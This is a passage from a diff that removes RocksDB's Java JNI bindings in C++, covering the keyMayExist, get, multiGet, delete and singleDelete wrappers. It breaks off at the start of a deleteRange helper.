-    rocksdb::ColumnFamilyHandle* cf_handle, jbyteArray jkey, jint jkey_off,
-    jint jkey_len, jobject jstring_builder, bool* has_exception) {
-
-  jbyte* key = new jbyte[jkey_len];
-  env->GetByteArrayRegion(jkey, jkey_off, jkey_len, key);
-  if(env->ExceptionCheck()) {
-    // exception thrown: ArrayIndexOutOfBoundsException
-    delete [] key;
-    *has_exception = true;
-    return false;
-  }
-
-  rocksdb::Slice key_slice(reinterpret_cast<char*>(key), jkey_len);
-
-  std::string value;
-  bool value_found = false;
-  bool keyMayExist;
-  if (cf_handle != nullptr) {
-    keyMayExist = db->KeyMayExist(read_opt, cf_handle, key_slice,
-        &value, &value_found);
-  } else {
-    keyMayExist = db->KeyMayExist(read_opt, key_slice,
-        &value, &value_found);
-  }
-
-  // cleanup
-  delete [] key;
-
-  // extract the value
-  if (value_found && !value.empty()) {
-    jobject jresult_string_builder =
-        rocksdb::StringBuilderJni::append(env, jstring_builder,
-            value.c_str());
-    if(jresult_string_builder == nullptr) {
-      *has_exception = true;
-      return false;
-    }
-  }
-
-  *has_exception = false;
-  return static_cast<jboolean>(keyMayExist);
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    keyMayExist
- * Signature: (J[BIILjava/lang/StringBuilder;)Z
- */
-jboolean Java_org_rocksdb_RocksDB_keyMayExist__J_3BIILjava_lang_StringBuilder_2(
-    JNIEnv* env, jobject jdb, jlong jdb_handle, jbyteArray jkey, jint jkey_off,
-    jint jkey_len, jobject jstring_builder) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  bool has_exception = false;
-  return key_may_exist_helper(env, db, rocksdb::ReadOptions(),
-      nullptr, jkey, jkey_off, jkey_len, jstring_builder, &has_exception);
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    keyMayExist
- * Signature: (J[BIIJLjava/lang/StringBuilder;)Z
- */
-jboolean Java_org_rocksdb_RocksDB_keyMayExist__J_3BIIJLjava_lang_StringBuilder_2(
-    JNIEnv* env, jobject jdb, jlong jdb_handle, jbyteArray jkey, jint jkey_off,
-    jint jkey_len, jlong jcf_handle, jobject jstring_builder) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(
-      jcf_handle);
-  if (cf_handle != nullptr) {
-    bool has_exception = false;
-    return key_may_exist_helper(env, db, rocksdb::ReadOptions(),
-        cf_handle, jkey, jkey_off, jkey_len, jstring_builder, &has_exception);
-  } else {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env,
-        rocksdb::Status::InvalidArgument("Invalid ColumnFamilyHandle."));
-    return true;
-  }
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    keyMayExist
- * Signature: (JJ[BIILjava/lang/StringBuilder;)Z
- */
-jboolean Java_org_rocksdb_RocksDB_keyMayExist__JJ_3BIILjava_lang_StringBuilder_2(
-    JNIEnv* env, jobject jdb, jlong jdb_handle, jlong jread_options_handle,
-    jbyteArray jkey, jint jkey_off, jint jkey_len, jobject jstring_builder) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  auto& read_options = *reinterpret_cast<rocksdb::ReadOptions*>(
-      jread_options_handle);
-  bool has_exception = false;
-  return key_may_exist_helper(env, db, read_options,
-      nullptr, jkey, jkey_off, jkey_len, jstring_builder, &has_exception);
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    keyMayExist
- * Signature: (JJ[BIIJLjava/lang/StringBuilder;)Z
- */
-jboolean Java_org_rocksdb_RocksDB_keyMayExist__JJ_3BIIJLjava_lang_StringBuilder_2(
-    JNIEnv* env, jobject jdb, jlong jdb_handle, jlong jread_options_handle,
-    jbyteArray jkey, jint jkey_off, jint jkey_len, jlong jcf_handle,
-    jobject jstring_builder) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  auto& read_options = *reinterpret_cast<rocksdb::ReadOptions*>(
-      jread_options_handle);
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(
-      jcf_handle);
-  if (cf_handle != nullptr) {
-    bool has_exception = false;
-    return key_may_exist_helper(env, db, read_options, cf_handle,
-        jkey, jkey_off, jkey_len, jstring_builder, &has_exception);
-  } else {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env,
-        rocksdb::Status::InvalidArgument("Invalid ColumnFamilyHandle."));
-    return true;
-  }
-}
-
-//////////////////////////////////////////////////////////////////////////////
-// rocksdb::DB::Get
-
-jbyteArray rocksdb_get_helper(
-    JNIEnv* env, rocksdb::DB* db, const rocksdb::ReadOptions& read_opt,
-    rocksdb::ColumnFamilyHandle* column_family_handle, jbyteArray jkey,
-    jint jkey_off, jint jkey_len) {
-
-  jbyte* key = new jbyte[jkey_len];
-  env->GetByteArrayRegion(jkey, jkey_off, jkey_len, key);
-  if(env->ExceptionCheck()) {
-    // exception thrown: ArrayIndexOutOfBoundsException
-    delete [] key;
-    return nullptr;
-  }
-
-  rocksdb::Slice key_slice(
-      reinterpret_cast<char*>(key), jkey_len);
-
-  std::string value;
-  rocksdb::Status s;
-  if (column_family_handle != nullptr) {
-    s = db->Get(read_opt, column_family_handle, key_slice, &value);
-  } else {
-    // backwards compatibility
-    s = db->Get(read_opt, key_slice, &value);
-  }
-
-  // cleanup
-  delete [] key;
-
-  if (s.IsNotFound()) {
-    return nullptr;
-  }
-
-  if (s.ok()) {
-    jbyteArray jret_value = rocksdb::JniUtil::copyBytes(env, value);
-    if(jret_value == nullptr) {
-      // exception occurred
-      return nullptr;
-    }
-    return jret_value;
-  }
-
-  rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-  return nullptr;
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    get
- * Signature: (J[BII)[B
- */
-jbyteArray Java_org_rocksdb_RocksDB_get__J_3BII(
-    JNIEnv* env, jobject jdb, jlong jdb_handle,
-    jbyteArray jkey, jint jkey_off, jint jkey_len) {
-  return rocksdb_get_helper(env,
-      reinterpret_cast<rocksdb::DB*>(jdb_handle),
-      rocksdb::ReadOptions(), nullptr,
-      jkey, jkey_off, jkey_len);
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    get
- * Signature: (J[BIIJ)[B
- */
-jbyteArray Java_org_rocksdb_RocksDB_get__J_3BIIJ(
-    JNIEnv* env, jobject jdb, jlong jdb_handle,
-    jbyteArray jkey, jint jkey_off, jint jkey_len, jlong jcf_handle) {
-  auto db_handle = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  auto cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-  if (cf_handle != nullptr) {
-    return rocksdb_get_helper(env, db_handle, rocksdb::ReadOptions(),
-        cf_handle, jkey, jkey_off, jkey_len);
-  } else {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env,
-        rocksdb::Status::InvalidArgument("Invalid ColumnFamilyHandle."));
-    return nullptr;
-  }
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    get
- * Signature: (JJ[BII)[B
- */
-jbyteArray Java_org_rocksdb_RocksDB_get__JJ_3BII(
-    JNIEnv* env, jobject jdb, jlong jdb_handle, jlong jropt_handle,
-    jbyteArray jkey, jint jkey_off, jint jkey_len) {
-  return rocksdb_get_helper(env,
-      reinterpret_cast<rocksdb::DB*>(jdb_handle),
-      *reinterpret_cast<rocksdb::ReadOptions*>(jropt_handle), nullptr,
-      jkey, jkey_off, jkey_len);
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    get
- * Signature: (JJ[BIIJ)[B
- */
-jbyteArray Java_org_rocksdb_RocksDB_get__JJ_3BIIJ(
-    JNIEnv* env, jobject jdb, jlong jdb_handle, jlong jropt_handle,
-    jbyteArray jkey, jint jkey_off, jint jkey_len, jlong jcf_handle) {
-  auto* db_handle = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  auto& ro_opt = *reinterpret_cast<rocksdb::ReadOptions*>(jropt_handle);
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-  if (cf_handle != nullptr) {
-    return rocksdb_get_helper(env, db_handle, ro_opt, cf_handle,
-        jkey, jkey_off, jkey_len);
-  } else {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env,
-        rocksdb::Status::InvalidArgument("Invalid ColumnFamilyHandle."));
-    return nullptr;
-  }
-}
-
-jint rocksdb_get_helper(JNIEnv* env, rocksdb::DB* db,
-                        const rocksdb::ReadOptions& read_options,
-                        rocksdb::ColumnFamilyHandle* column_family_handle,
-                        jbyteArray jkey, jint jkey_off, jint jkey_len,
-                        jbyteArray jval, jint jval_off, jint jval_len,
-                        bool* has_exception) {
-  static const int kNotFound = -1;
-  static const int kStatusError = -2;
-
-  jbyte* key = new jbyte[jkey_len];
-  env->GetByteArrayRegion(jkey, jkey_off, jkey_len, key);
-  if(env->ExceptionCheck()) {
-    // exception thrown: OutOfMemoryError
-    delete [] key;
-    *has_exception = true;
-    return kStatusError;
-  }
-  rocksdb::Slice key_slice(reinterpret_cast<char*>(key), jkey_len);
-
-  // TODO(yhchiang): we might save one memory allocation here by adding
-  // a DB::Get() function which takes preallocated jbyte* as input.
-  std::string cvalue;
-  rocksdb::Status s;
-  if (column_family_handle != nullptr) {
-    s = db->Get(read_options, column_family_handle, key_slice, &cvalue);
-  } else {
-    // backwards compatibility
-    s = db->Get(read_options, key_slice, &cvalue);
-  }
-
-  // cleanup
-  delete [] key;
-
-  if (s.IsNotFound()) {
-    *has_exception = false;
-    return kNotFound;
-  } else if (!s.ok()) {
-    *has_exception = true;
-    // Here since we are throwing a Java exception from c++ side.
-    // As a result, c++ does not know calling this function will in fact
-    // throwing an exception.  As a result, the execution flow will
-    // not stop here, and codes after this throw will still be
-    // executed.
-    rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-
-    // Return a dummy const value to avoid compilation error, although
-    // java side might not have a chance to get the return value :)
-    return kStatusError;
-  }
-
-  const jint cvalue_len = static_cast<jint>(cvalue.size());
-  const jint length = std::min(jval_len, cvalue_len);
-
-  env->SetByteArrayRegion(jval, jval_off, length,
-                          const_cast<jbyte*>(reinterpret_cast<const jbyte*>(cvalue.c_str())));
-  if(env->ExceptionCheck()) {
-    // exception thrown: OutOfMemoryError
-    *has_exception = true;
-    return kStatusError;
-  }
-
-  *has_exception = false;
-  return cvalue_len;
-}
-
-inline void multi_get_helper_release_keys(JNIEnv* env,
-    std::vector<std::pair<jbyte*, jobject>> &keys_to_free) {
-  auto end = keys_to_free.end();
-  for (auto it = keys_to_free.begin(); it != end; ++it) {
-    delete [] it->first;
-    env->DeleteLocalRef(it->second);
-  }
-  keys_to_free.clear();
-}
-
-/**
- * cf multi get
- *
- * @return byte[][] of values or nullptr if an exception occurs
- */
-jobjectArray multi_get_helper(JNIEnv* env, jobject jdb, rocksdb::DB* db,
-    const rocksdb::ReadOptions& rOpt, jobjectArray jkeys,
-    jintArray jkey_offs, jintArray jkey_lens,
-    jlongArray jcolumn_family_handles) {
-  std::vector<rocksdb::ColumnFamilyHandle*> cf_handles;
-  if (jcolumn_family_handles != nullptr) {
-    const jsize len_cols = env->GetArrayLength(jcolumn_family_handles);
-
-    jlong* jcfh = env->GetLongArrayElements(jcolumn_family_handles, nullptr);
-    if(jcfh == nullptr) {
-      // exception thrown: OutOfMemoryError
-      return nullptr;
-    }
-
-    for (jsize i = 0; i < len_cols; i++) {
-      auto* cf_handle =
-          reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcfh[i]);
-      cf_handles.push_back(cf_handle);
-    }
-    env->ReleaseLongArrayElements(jcolumn_family_handles, jcfh, JNI_ABORT);
-  }
-
-  const jsize len_keys = env->GetArrayLength(jkeys);
-  if (env->EnsureLocalCapacity(len_keys) != 0) {
-    // exception thrown: OutOfMemoryError
-    return nullptr;
-  }
-
-  jint* jkey_off = env->GetIntArrayElements(jkey_offs, nullptr);
-  if(jkey_off == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return nullptr;
-  }
-
-  jint* jkey_len = env->GetIntArrayElements(jkey_lens, nullptr);
-  if(jkey_len == nullptr) {
-    // exception thrown: OutOfMemoryError
-    env->ReleaseIntArrayElements(jkey_offs, jkey_off, JNI_ABORT);
-    return nullptr;
-  }
-
-  std::vector<rocksdb::Slice> keys;
-  std::vector<std::pair<jbyte*, jobject>> keys_to_free;
-  for (jsize i = 0; i < len_keys; i++) {
-    jobject jkey = env->GetObjectArrayElement(jkeys, i);
-    if(env->ExceptionCheck()) {
-      // exception thrown: ArrayIndexOutOfBoundsException
-      env->ReleaseIntArrayElements(jkey_lens, jkey_len, JNI_ABORT);
-      env->ReleaseIntArrayElements(jkey_offs, jkey_off, JNI_ABORT);
-      multi_get_helper_release_keys(env, keys_to_free);
-      return nullptr;
-    }
-
-    jbyteArray jkey_ba = reinterpret_cast<jbyteArray>(jkey);
-
-    const jint len_key = jkey_len[i];
-    jbyte* key = new jbyte[len_key];
-    env->GetByteArrayRegion(jkey_ba, jkey_off[i], len_key, key);
-    if(env->ExceptionCheck()) {
-      // exception thrown: ArrayIndexOutOfBoundsException
-      delete [] key;
-      env->DeleteLocalRef(jkey);
-      env->ReleaseIntArrayElements(jkey_lens, jkey_len, JNI_ABORT);
-      env->ReleaseIntArrayElements(jkey_offs, jkey_off, JNI_ABORT);
-      multi_get_helper_release_keys(env, keys_to_free);
-      return nullptr;
-    }
-
-    rocksdb::Slice key_slice(reinterpret_cast<char*>(key), len_key);
-    keys.push_back(key_slice);
-
-    keys_to_free.push_back(std::pair<jbyte*, jobject>(key, jkey));
-  }
-
-  // cleanup jkey_off and jken_len
-  env->ReleaseIntArrayElements(jkey_lens, jkey_len, JNI_ABORT);
-  env->ReleaseIntArrayElements(jkey_offs, jkey_off, JNI_ABORT);
-
-  std::vector<std::string> values;
-  std::vector<rocksdb::Status> s;
-  if (cf_handles.size() == 0) {
-    s = db->MultiGet(rOpt, keys, &values);
-  } else {
-    s = db->MultiGet(rOpt, cf_handles, keys, &values);
-  }
-
-  // free up allocated byte arrays
-  multi_get_helper_release_keys(env, keys_to_free);
-
-  // prepare the results
-  jobjectArray jresults =
-      rocksdb::ByteJni::new2dByteArray(env, static_cast<jsize>(s.size()));
-  if(jresults == nullptr) {
-    // exception occurred
-    return nullptr;
-  }
-
-  // TODO(AR) it is not clear to me why EnsureLocalCapacity is needed for the
-  //     loop as we cleanup references with env->DeleteLocalRef(jentry_value);
-  if (env->EnsureLocalCapacity(static_cast<jint>(s.size())) != 0) {
-    // exception thrown: OutOfMemoryError
-    return nullptr;
-  }
-  // add to the jresults
-  for (std::vector<rocksdb::Status>::size_type i = 0; i != s.size(); i++) {
-    if (s[i].ok()) {
-      std::string* value = &values[i];
-      const jsize jvalue_len = static_cast<jsize>(value->size());
-      jbyteArray jentry_value = env->NewByteArray(jvalue_len);
-      if(jentry_value == nullptr) {
-        // exception thrown: OutOfMemoryError
-        return nullptr;
-      }
-
-      env->SetByteArrayRegion(jentry_value, 0, static_cast<jsize>(jvalue_len),
-          const_cast<jbyte*>(reinterpret_cast<const jbyte*>(value->c_str())));
-      if(env->ExceptionCheck()) {
-        // exception thrown: ArrayIndexOutOfBoundsException
-        env->DeleteLocalRef(jentry_value);
-        return nullptr;
-      }
-
-      env->SetObjectArrayElement(jresults, static_cast<jsize>(i), jentry_value);
-      if(env->ExceptionCheck()) {
-        // exception thrown: ArrayIndexOutOfBoundsException
-        env->DeleteLocalRef(jentry_value);
-        return nullptr;
-      }
-
-      env->DeleteLocalRef(jentry_value);
-    }
-  }
-
-  return jresults;
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    multiGet
- * Signature: (J[[B[I[I)[[B
- */
-jobjectArray Java_org_rocksdb_RocksDB_multiGet__J_3_3B_3I_3I(
-    JNIEnv* env, jobject jdb, jlong jdb_handle, jobjectArray jkeys,
-    jintArray jkey_offs, jintArray jkey_lens) {
-  return multi_get_helper(env, jdb, reinterpret_cast<rocksdb::DB*>(jdb_handle),
-      rocksdb::ReadOptions(), jkeys, jkey_offs, jkey_lens, nullptr);
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    multiGet
- * Signature: (J[[B[I[I[J)[[B
- */
-jobjectArray Java_org_rocksdb_RocksDB_multiGet__J_3_3B_3I_3I_3J(
-    JNIEnv* env, jobject jdb, jlong jdb_handle, jobjectArray jkeys,
-    jintArray jkey_offs, jintArray jkey_lens,
-    jlongArray jcolumn_family_handles) {
-  return multi_get_helper(env, jdb, reinterpret_cast<rocksdb::DB*>(jdb_handle),
-      rocksdb::ReadOptions(), jkeys, jkey_offs, jkey_lens,
-      jcolumn_family_handles);
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    multiGet
- * Signature: (JJ[[B[I[I)[[B
- */
-jobjectArray Java_org_rocksdb_RocksDB_multiGet__JJ_3_3B_3I_3I(
-    JNIEnv* env, jobject jdb, jlong jdb_handle, jlong jropt_handle,
-    jobjectArray jkeys, jintArray jkey_offs, jintArray jkey_lens) {
-  return multi_get_helper(env, jdb, reinterpret_cast<rocksdb::DB*>(jdb_handle),
-      *reinterpret_cast<rocksdb::ReadOptions*>(jropt_handle), jkeys, jkey_offs,
-      jkey_lens, nullptr);
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    multiGet
- * Signature: (JJ[[B[I[I[J)[[B
- */
-jobjectArray Java_org_rocksdb_RocksDB_multiGet__JJ_3_3B_3I_3I_3J(
-    JNIEnv* env, jobject jdb, jlong jdb_handle, jlong jropt_handle,
-    jobjectArray jkeys, jintArray jkey_offs, jintArray jkey_lens,
-    jlongArray jcolumn_family_handles) {
-  return multi_get_helper(env, jdb, reinterpret_cast<rocksdb::DB*>(jdb_handle),
-      *reinterpret_cast<rocksdb::ReadOptions*>(jropt_handle), jkeys, jkey_offs,
-      jkey_lens, jcolumn_family_handles);
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    get
- * Signature: (J[BII[BII)I
- */
-jint Java_org_rocksdb_RocksDB_get__J_3BII_3BII(JNIEnv* env, jobject jdb,
-                                               jlong jdb_handle,
-                                               jbyteArray jkey, jint jkey_off,
-                                               jint jkey_len, jbyteArray jval,
-                                               jint jval_off, jint jval_len) {
-  bool has_exception = false;
-  return rocksdb_get_helper(env, reinterpret_cast<rocksdb::DB*>(jdb_handle),
-                            rocksdb::ReadOptions(), nullptr, jkey, jkey_off,
-                            jkey_len, jval, jval_off, jval_len,
-                            &has_exception);
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    get
- * Signature: (J[BII[BIIJ)I
- */
-jint Java_org_rocksdb_RocksDB_get__J_3BII_3BIIJ(JNIEnv* env, jobject jdb,
-                                                jlong jdb_handle,
-                                                jbyteArray jkey, jint jkey_off,
-                                                jint jkey_len, jbyteArray jval,
-                                                jint jval_off, jint jval_len,
-                                                jlong jcf_handle) {
-  auto* db_handle = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-  if (cf_handle != nullptr) {
-    bool has_exception = false;
-    return rocksdb_get_helper(env, db_handle, rocksdb::ReadOptions(), cf_handle,
-                              jkey, jkey_off, jkey_len, jval, jval_off,
-                              jval_len, &has_exception);
-  } else {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env,
-        rocksdb::Status::InvalidArgument("Invalid ColumnFamilyHandle."));
-    // will never be evaluated
-    return 0;
-  }
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    get
- * Signature: (JJ[BII[BII)I
- */
-jint Java_org_rocksdb_RocksDB_get__JJ_3BII_3BII(JNIEnv* env, jobject jdb,
-                                                jlong jdb_handle,
-                                                jlong jropt_handle,
-                                                jbyteArray jkey, jint jkey_off,
-                                                jint jkey_len, jbyteArray jval,
-                                                jint jval_off, jint jval_len) {
-  bool has_exception = false;
-  return rocksdb_get_helper(
-      env, reinterpret_cast<rocksdb::DB*>(jdb_handle),
-      *reinterpret_cast<rocksdb::ReadOptions*>(jropt_handle), nullptr, jkey,
-      jkey_off, jkey_len, jval, jval_off, jval_len, &has_exception);
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    get
- * Signature: (JJ[BII[BIIJ)I
- */
-jint Java_org_rocksdb_RocksDB_get__JJ_3BII_3BIIJ(
-    JNIEnv* env, jobject jdb, jlong jdb_handle, jlong jropt_handle,
-    jbyteArray jkey, jint jkey_off, jint jkey_len, jbyteArray jval,
-    jint jval_off, jint jval_len, jlong jcf_handle) {
-  auto* db_handle = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  auto& ro_opt = *reinterpret_cast<rocksdb::ReadOptions*>(jropt_handle);
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-  if (cf_handle != nullptr) {
-    bool has_exception = false;
-    return rocksdb_get_helper(env, db_handle, ro_opt, cf_handle, jkey, jkey_off,
-                              jkey_len, jval, jval_off, jval_len,
-                              &has_exception);
-  } else {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env,
-        rocksdb::Status::InvalidArgument("Invalid ColumnFamilyHandle."));
-    // will never be evaluated
-    return 0;
-  }
-}
-
-//////////////////////////////////////////////////////////////////////////////
-// rocksdb::DB::Delete()
-
-/**
- * @return true if the delete succeeded, false if a Java Exception was thrown
- */
-bool rocksdb_delete_helper(
-    JNIEnv* env, rocksdb::DB* db, const rocksdb::WriteOptions& write_options,
-    rocksdb::ColumnFamilyHandle* cf_handle, jbyteArray jkey, jint jkey_off,
-    jint jkey_len) {
-  jbyte* key = new jbyte[jkey_len];
-  env->GetByteArrayRegion(jkey, jkey_off, jkey_len, key);
-  if(env->ExceptionCheck()) {
-    // exception thrown: ArrayIndexOutOfBoundsException
-    delete [] key;
-    return false;
-  }
-  rocksdb::Slice key_slice(reinterpret_cast<char*>(key), jkey_len);
-
-  rocksdb::Status s;
-  if (cf_handle != nullptr) {
-    s = db->Delete(write_options, cf_handle, key_slice);
-  } else {
-    // backwards compatibility
-    s = db->Delete(write_options, key_slice);
-  }
-
-  // cleanup
-  delete [] key;
-
-  if (s.ok()) {
-    return true;
-  }
-
-  rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-  return false;
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    delete
- * Signature: (J[BII)V
- */
-void Java_org_rocksdb_RocksDB_delete__J_3BII(
-    JNIEnv* env, jobject jdb, jlong jdb_handle,
-    jbyteArray jkey, jint jkey_off, jint jkey_len) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  static const rocksdb::WriteOptions default_write_options =
-      rocksdb::WriteOptions();
-  rocksdb_delete_helper(env, db, default_write_options, nullptr,
-      jkey, jkey_off, jkey_len);
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    delete
- * Signature: (J[BIIJ)V
- */
-void Java_org_rocksdb_RocksDB_delete__J_3BIIJ(
-    JNIEnv* env, jobject jdb, jlong jdb_handle,
-    jbyteArray jkey, jint jkey_off, jint jkey_len, jlong jcf_handle) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  static const rocksdb::WriteOptions default_write_options =
-      rocksdb::WriteOptions();
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-  if (cf_handle != nullptr) {
-    rocksdb_delete_helper(env, db, default_write_options, cf_handle,
-        jkey, jkey_off, jkey_len);
-  } else {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env,
-        rocksdb::Status::InvalidArgument("Invalid ColumnFamilyHandle."));
-  }
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    delete
- * Signature: (JJ[BII)V
- */
-void Java_org_rocksdb_RocksDB_delete__JJ_3BII(
-    JNIEnv* env, jobject jdb, jlong jdb_handle,
-    jlong jwrite_options, jbyteArray jkey, jint jkey_off, jint jkey_len) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  auto* write_options =
-      reinterpret_cast<rocksdb::WriteOptions*>(jwrite_options);
-  rocksdb_delete_helper(env, db, *write_options, nullptr, jkey, jkey_off,
-      jkey_len);
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    delete
- * Signature: (JJ[BIIJ)V
- */
-void Java_org_rocksdb_RocksDB_delete__JJ_3BIIJ(
-    JNIEnv* env, jobject jdb, jlong jdb_handle,
-    jlong jwrite_options, jbyteArray jkey, jint jkey_off, jint jkey_len,
-    jlong jcf_handle) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  auto* write_options =
-      reinterpret_cast<rocksdb::WriteOptions*>(jwrite_options);
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-  if (cf_handle != nullptr) {
-    rocksdb_delete_helper(env, db, *write_options, cf_handle, jkey, jkey_off,
-        jkey_len);
-  } else {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env,
-        rocksdb::Status::InvalidArgument("Invalid ColumnFamilyHandle."));
-  }
-}
-
-//////////////////////////////////////////////////////////////////////////////
-// rocksdb::DB::SingleDelete()
-/**
- * @return true if the single delete succeeded, false if a Java Exception
- *     was thrown
- */
-bool rocksdb_single_delete_helper(
-    JNIEnv* env, rocksdb::DB* db, const rocksdb::WriteOptions& write_options,
-    rocksdb::ColumnFamilyHandle* cf_handle, jbyteArray jkey, jint jkey_len) {
-  jbyte* key = env->GetByteArrayElements(jkey, nullptr);
-  if(key == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return false;
-  }
-  rocksdb::Slice key_slice(reinterpret_cast<char*>(key), jkey_len);
-
-  rocksdb::Status s;
-  if (cf_handle != nullptr) {
-    s = db->SingleDelete(write_options, cf_handle, key_slice);
-  } else {
-    // backwards compatibility
-    s = db->SingleDelete(write_options, key_slice);
-  }
-
-  // trigger java unref on key and value.
-  // by passing JNI_ABORT, it will simply release the reference without
-  // copying the result back to the java byte array.
-  env->ReleaseByteArrayElements(jkey, key, JNI_ABORT);
-
-  if (s.ok()) {
-    return true;
-  }
-
-  rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-  return false;
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    singleDelete
- * Signature: (J[BI)V
- */
-void Java_org_rocksdb_RocksDB_singleDelete__J_3BI(
-    JNIEnv* env, jobject jdb, jlong jdb_handle,
-    jbyteArray jkey, jint jkey_len) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  static const rocksdb::WriteOptions default_write_options =
-      rocksdb::WriteOptions();
-  rocksdb_single_delete_helper(env, db, default_write_options, nullptr,
-      jkey, jkey_len);
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    singleDelete
- * Signature: (J[BIJ)V
- */
-void Java_org_rocksdb_RocksDB_singleDelete__J_3BIJ(
-    JNIEnv* env, jobject jdb, jlong jdb_handle,
-    jbyteArray jkey, jint jkey_len, jlong jcf_handle) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  static const rocksdb::WriteOptions default_write_options =
-      rocksdb::WriteOptions();
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-  if (cf_handle != nullptr) {
-    rocksdb_single_delete_helper(env, db, default_write_options, cf_handle,
-        jkey, jkey_len);
-  } else {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env,
-        rocksdb::Status::InvalidArgument("Invalid ColumnFamilyHandle."));
-  }
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    singleDelete
- * Signature: (JJ[BIJ)V
- */
-void Java_org_rocksdb_RocksDB_singleDelete__JJ_3BI(
-    JNIEnv* env, jobject jdb, jlong jdb_handle,
-    jlong jwrite_options, jbyteArray jkey, jint jkey_len) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  auto* write_options =
-      reinterpret_cast<rocksdb::WriteOptions*>(jwrite_options);
-  rocksdb_single_delete_helper(env, db, *write_options, nullptr, jkey,
-      jkey_len);
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    singleDelete
- * Signature: (JJ[BIJ)V
- */
-void Java_org_rocksdb_RocksDB_singleDelete__JJ_3BIJ(
-    JNIEnv* env, jobject jdb, jlong jdb_handle,
-    jlong jwrite_options, jbyteArray jkey, jint jkey_len,
-    jlong jcf_handle) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  auto* write_options =
-      reinterpret_cast<rocksdb::WriteOptions*>(jwrite_options);
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-  if (cf_handle != nullptr) {
-    rocksdb_single_delete_helper(env, db, *write_options, cf_handle, jkey,
-        jkey_len);
-  } else {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env,
-        rocksdb::Status::InvalidArgument("Invalid ColumnFamilyHandle."));
-  }
-}
-
-//////////////////////////////////////////////////////////////////////////////
-// rocksdb::DB::DeleteRange()
-/**
- * @return true if the delete range succeeded, false if a Java Exception
- *     was thrown
- */
-bool rocksdb_delete_range_helper(JNIEnv* env, rocksdb::DB* db,
-                                 const rocksdb::WriteOptions& write_options,
-                                 rocksdb::ColumnFamilyHandle* cf_handle,
-                                 jbyteArray jbegin_key, jint jbegin_key_off,
-                                 jint jbegin_key_len, jbyteArray jend_key,
-                                 jint jend_key_off, jint jend_key_len) {
-  jbyte* begin_key = new jbyte[jbegin_key_len];
-  env->GetByteArrayRegion(jbegin_key, jbegin_key_off, jbegin_key_len,
